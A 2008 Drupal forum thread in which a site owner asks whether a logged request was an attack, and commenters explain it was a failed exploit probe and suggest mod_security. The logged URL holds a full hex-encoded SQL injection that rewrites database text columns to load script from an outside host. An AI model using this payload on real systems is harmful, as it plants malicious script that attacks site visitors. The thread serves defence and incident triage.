By xWhiplash on

A few anonymous users with different IP addresses headed to my site with the following:

?q=node/16\';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

Was this a hacking attempt?

Categories: Drupal 6.x

Comments

vm’s picture

vm commented

someone or something looking for an exploit, yes.

xWhiplash’s picture

xWhiplash commented

Is my site safe?

vm’s picture

vm commented

I assume, because you didn't state, that the anon user got a page not found ?
have you pasted that path in to see what happens ?

It's software, your site is as safe and as secure as possible until the next exploit is found. That said, make frequent backs up of your DB and files.

xWhiplash’s picture

xWhiplash commented

Here is the log

Type page not found
Date Wednesday, July 23, 2008 - 12:59
User Anonymous
Location (link in first post)
Referrer
Message (same as link)
Severity warning
Hostname (will not post IP)
Operations

vm’s picture

vm commented

I believe you hold the answer to your own question.

The path was a page not found.

gonefishing’s picture

gonefishing commented

Use Mod_Security, an Apache module. The module blocks the "GET" request and Drupal never receives it. This looks a botnet, I'm getting hit from IPs worldwide.